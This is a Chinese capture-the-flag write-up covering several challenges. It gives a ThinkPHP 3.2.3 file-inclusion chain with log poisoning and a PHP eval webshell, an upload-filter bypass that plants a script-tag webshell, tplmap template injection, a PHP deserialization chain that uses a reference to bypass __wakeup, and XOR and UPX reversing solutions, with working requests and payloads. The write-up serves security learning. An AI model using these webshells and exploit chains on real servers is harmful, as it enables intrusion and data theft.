给源码了 thinkphp3.2.3,index路由有个 textBox方法，简单设置参数和渲染，

3.2.3 包含一个文件的关键点是File.class.php 变量覆盖在这里，但是assign该方法的第一个参数已经固定，因此无法在这里覆盖filename。

上边有个parse_str函数去解析post.query 变量覆盖，继续向下看$this->display(T("Home@default/list"));在这里渲染list.html,调用 W方法，重点应该在这里parse_str函数和W方法 看渲染成功生产php这里调用页面 W并传入方法 参数param是可控的

一路跟进到R这里调用方法call_user_func_array 可见函数名是定死的Home\Widget\queryWidget 但参数是可控的param(是我们介绍的query) 通过$this->assign("array",$array);赋值给了array 继续跟queryWidget 这里把array数组里的 name、tag、id 作为参数调用B方法。 B直接调用方法\Think\Hook::exec ，注意这里跟的时候一定要传。name和id参数 query=name%3d1%26id=1%26tag=1，否则不会进入if

下一步直接到这里，你可以看到exec任何类别的任何方法都可以执行，参数可控，唯一的限制就是只有一个参数。

这里直接使用包含漏洞的文件File.class.php 里的file.load，可以包含任何文件，试着直接阅读文件 query=name%3d\Think\Storage\Driver\File%26id=/etc/passwd%26tag=load 读成功了 但是在题目环境中找不到flag，利用包含日志文件getshell 结构报错，注意使用bp浏览器会自动编码头发。

GET /index.php?m=--><?=eval($_GET['cmd']);?> HTTP/1.1 Host: 172.16.30.172:58002 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close 

然后包含日志文件。

POST /?m=Home&c=Index&a=textBox&cmd=system('cat /Secret_is_h3re'); HTTP/1.1 Host: 172.16.30.172:58002 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 110 Content-Type: application/x-www-form-urlencoded  query=name%3d\Think\Storage\Driver\File%26id=Application/Runtime/Logs/Common/22_06_18.log%26tag=load 

打开主题，根据提示发送请求包，抓取响应包：

将GuessWhatThis1sY0urIdentity再次提交得到文件上传地址h1dden_p4ge.php

经过一系列测试，可以得出以下结论：

• <? 被过滤
• 后缀名将被截获，并再次拼接到文件名中
• 中间件版本Apache/2.4.7 因此，使用木马如下 <script language="pHp">@eval($_POST['sb'])</script> 后缀会拼接，大小写可以绕过，只要是php结尾，拼接无所谓 因此，构建文件名： Husins.jpg.Php 上传后访问，连接蚁剑 拿到flag

直接tplmap 一把梭，啰嗦就完了

反序列化链 B __destruct >A __get=>A __get=>A __call=>C getFlag 设置$this->functions 为array("_name"=>array(new C(),'getFlag'))这样调用 call_user_func_array($this->functions[$name],$arg) 相当于调用 call_user_func_array(array("_name"=>array(new C(),'getFlag')),$arg)。 但是这里A类的wakeup方法会做空，需要绕过__wakeup回包可以看到方法PHP版本为8，因此无法通过修改尺寸来绕过。

public function __wakeup(){ 
             echo "serA";     $this->functions =[];
}

利用 R:2;元素。它的意思是“引用第二个值”， 作用相当于是指针。

$a = ["foo"];
$a[1] =& $a[0];

a:2:{ 
        i:0;s:3:"foo";i:1;R:2;}

这里相当于a数组的第二个参数引用整个序列化数组的第二个值也就是foo，或者也可以直接引用变量，这样当变量改变时，引用他的值也会随之改变。回到题目B类的wakeup函数有个赋值操作。 $this->a = $this->b; 如果B类的__wakeup反序列化时调用在A类的__wakeup之后，我们将 A 的 $this->functions 引用为$a 再设置$b 为array("_name"=>array(new C(),'getFlag')) 这样就可以在$this->functions制空之后，在重新赋值。这样就相当于绕过了A类的__wakeup 本地测试一下调用顺序，可以看到B类的 反序列化时调用顺序没问题构造payload

<?php
error_reporting(0);
class A{ 
        
    private $functions=9999;


    public function __wakeup(){ 
        
        echo "serA";
        $this->functions = [];
    }
    public function __call($name,$arg){ 
        
        call_user_func_array($this->functions[$name],$arg);
    }
    public function __get($name){ 
        
        $this->__call($name,[]);
    }
}
class B{ 
        
    private $a;
    private $b;
    public $c;
    public function __construct()
    { 
        
        $this->b=array("_name"=>array(new C(),'getFlag'));
    }

    public function __destruct(){ 
        
        $this->b=array("_name"=>array(new C(),'getFlag'));
        echo "serB1";
        echo $this->c->_name;
    }
    public function __wakeup(){ 
        
        echo "serB2";
        $this->a = $this->b;
    }
}
class C{ 
        
    public function getFlag(){ 
        
        echo file_get_contents("/etc/passwd");
    }
}

$a1 = new B();
$a2 = new A();
$a1->c = $a2;
echo serialize($a1);
echo urlencode(serialize($a1));
echo urlencode(str_replace("i:9999","R:2",serialize($a1)));

因为有私有参数，所以得url编码一下 Payload

O%3A1%3A%22B%22%3A3%3A%7Bs%3A4%3A%22%00B%00a%22%3BN%3Bs%3A4%3A%22%00B%00b%22%3Ba%3A1%3A%7Bs%3A5%3A%22_name%22%3Ba%3A2%3A%7Bi%3A0%3BO%3A1%3A%22C%22%3A0%3A%7B%7Di%3A1%3Bs%3A7%3A%22getFlag%22%3B%7D%7Ds%3A1%3A%22c%22%3BO%3A1%3A%22A%22%3A1%3A%7Bs%3A12%3A%22%00A%00functions%22%3BR%3A2%3B%7D%7D

逆向得出加密算法如下

flag = 'flag{12345678876543211234567887654321}'

flag_c = []

f = []

for i in range(38):

    flag_c.append(ord(flag[i]))

print flag_c


for i in range(35):

    flag_c[i] = flag_c[i]^flag_c[i+1]

    flag_c[i+1] = flag_c[i+1]^flag_c[i+2]

    flag_c[i+2] = flag_c[i+2]^flag_c[i+3]



for i in range(38):

    f.append(hex(flag_c[i]))


print f

print len(f)

写出解密算法

cipher = [0x0A, 0x0B, 0x7D, 0x2F, 0x7F, 0x67, 0x65, 0x30, 0x63, 0x60, 0x37, 0x3F, 0x3C, 0x3F, 0x33, 0x3A,0x3C, 0x3B, 0x35, 0x3C, 0x3E, 0x6C, 0x64, 0x31, 0x64, 0x6C, 0x3B, 0x68, 0x61, 0x62, 0x65, 0x36,0x33, 0x60, 0x62, 0x36, 0x1C, 0x7D]

f = ''

cipher = cipher[::-1]



flag = ''

for i in range(35):

    cipher[i+1] = (cipher[i]^cipher[i+1])

    cipher[i+2] = (cipher[i+1]^cipher[i+2])

    cipher[i+3] = (cipher[i+2]^cipher[i+3])



cipher = cipher[::-1]



for x in range(38):

    flag += chr(cipher[x])

print flag

IDA打开发现段名称为vmp，仔细检查发现实际加壳为upx，只是将段名进行了修改。把段名改回为UPX，使用upx -d可以将壳脱下。 静态审计发现并未找到报错信息Wrong，直接使用动态调试断在输入处，通过查找栈回溯可以找到关键逻辑处理的地方。

向下可以找到check处。

输入测试数据格式为flag{}，通过观察输入测试数据加密过后的密文和flag的密文，猜测为xor运算，反查直接得到key，这样可以省去逆向的过程。使用exp直接解密验证。

cip = [0x56,0xEC,0xA0,0xDC,0x57,0x06,0xFE,0xA3,0xEB,0x72,0xEA,0x97,0xE2,0x87,0x03,0xAA,0x18,0x6A,0xF3,0xBE,0xBD,0xDA,0x79,0x0A,0x98,0x36,0x12,0x5C,0xE0,0x94,0x61,0x5A, 0x42,0xBC,0x4B,0x01,0x49,0x7B,0x5F]

flag = 'flag{12345678876543211234567887654321}'

cip2 = [0x56,0xEC,0xA0,0xDC,0x57,0x07,0xF4,0xA3,0xE9,0x77,0xBF,0x93,0xBC,0x86,0x52,0xA5,0x14,0x6A,0xA5,0xBD,0xB5,0xD2,0x7F,0x0B,0x9B,0x67,0x1D,0x08,0xEF,0xC9,0x32,0x5D,0x43,0xED,0x1E,0x01,0x4B,0x7B,0x01]



flag2 = ''

key = []



for i in range(len(flag)):

    key.append(ord(flag[i])^cip[i])



print key

for i in range(len(key)):

    flag2 += chr(key[i]^cip2[i])

print flag2

这题利用jadx-gui打开 查看发现密文是每4位进行一个md5加密 分开解密即可

使用ida打开，通过Wrong字符交叉引用找到主要部分 首先限制了输入范围97-102或者48-57 调整v4、v7爆破即可